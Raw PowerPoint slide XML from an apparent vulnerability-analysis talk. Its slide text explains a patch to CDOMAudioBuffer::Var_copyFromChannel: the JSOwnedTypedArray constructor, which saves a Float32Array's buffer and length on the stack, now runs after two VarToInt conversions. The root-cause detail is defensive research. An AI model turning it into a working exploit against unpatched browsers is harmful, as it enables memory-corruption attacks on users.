      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237255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pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B59EEF-6573-4CAD-9A94-C18ABBD6868F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1121940" y="3416822"/>
            <a:ext cx="10857393" cy="3909232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Patch Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7687FDB-CDA0-41CB-9339-DCB845DE7341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="9197774" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CDOMAudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Var_copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> after patch</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2448E6-BA70-4E9D-9B16-0F2FF324308E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025878" y="8424918"/>
            <a:ext cx="10953455" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The patch puts the function WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt; after two </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JsStaticAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarToInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> functions</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1908DDCB-B5C5-41FF-9B6E-BD02297AF11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644497" y="5675085"/>
            <a:ext cx="9342818" cy="27521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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="肘形连接符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3D4FA3-007E-4378-9A6C-B96C42D98E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="20" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5171946" y="7094258"/>
            <a:ext cx="2474620" cy="186700"/>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7958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 Vulnerability Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7687FDB-CDA0-41CB-9339-DCB845DE7341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="9542997" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A2448E6-BA70-4E9D-9B16-0F2FF324308E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1025878" y="9007601"/>
            <a:ext cx="10953455" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt; saves the buffer and length of the Float32Array to its own data structure on the stack.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C92C1C-8D8C-4ABC-8437-90146AE64776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078128" y="6526173"/>
            <a:ext cx="7122444" cy="2365189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F745D3-03DC-47B1-8389-7270BEC228CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078128" y="3051471"/>
            <a:ext cx="8414216" cy="1091921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="内容占位符 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36523010-5620-4494-B517-FEEAF0896370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="4134307"/>
            <a:ext cx="7122446" cy="2391866"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E982CB-36F0-4498-88E8-1D1F26D1EBEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044198" y="4574185"/>
            <a:ext cx="2541261" cy="2265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16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9796821-6738-49EC-8F54-39A2F4C256ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637706" y="4355285"/>
            <a:ext cx="2541261" cy="2265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19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7778DA84-39CC-4B38-A38C-C15608977FE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3044197" y="7183486"/>
            <a:ext cx="2541261" cy="2265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22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{811DC0AA-02D8-4DA5-88BE-466A566D3826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637705" y="7382489"/>
            <a:ext cx="2541261" cy="2265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24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2EA9F3-8C78-4654-ABAB-EDAF405D185B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8529231" y="4931050"/>
            <a:ext cx="4335447" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Float32Array</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DA0449-DE57-43E4-83F2-8CBB482F0190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8449879" y="6127077"/>
            <a:ext cx="3633948" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Float32Array</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="连接符: 肘形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E698FEE-87C4-4FD5-B9CE-5FABA0EA33C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8178967" y="4468545"/>
            <a:ext cx="2517988" cy="462505"/>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连接符: 肘形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28DA393-D501-472E-9EFE-12AFE78AED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="3"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8178966" y="5454270"/>
            <a:ext cx="2517989" cy="2041479"/>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1" name="连接符: 肘形 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCF08F1A-4D7A-4953-AF48-60BE13C12439}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="25" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6627655" y="2487879"/>
            <a:ext cx="1326372" cy="5952024"/>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连接符: 肘形 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04D3AE9-DC8F-425D-AFB6-787904036A60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="19" idx="2"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6910985" y="4054139"/>
            <a:ext cx="759709" cy="5952025"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3009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35852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 Vulnerability Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A39A4E2-63A6-43FA-AD13-0F63EE64DB3D}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BE71998-29F7-430D-8F03-2753C6EC09B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078129" y="3059210"/>
            <a:ext cx="6188203" cy="2594512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="图片 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3875A5-01C0-46B2-AD33-6506D0BE57F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050328" y="5696651"/>
            <a:ext cx="6243803" cy="1895159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE902DC9-CECC-45CE-B0CB-A4E52FC0C581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2558882"/>
            <a:ext cx="10627776" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JsStaticAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
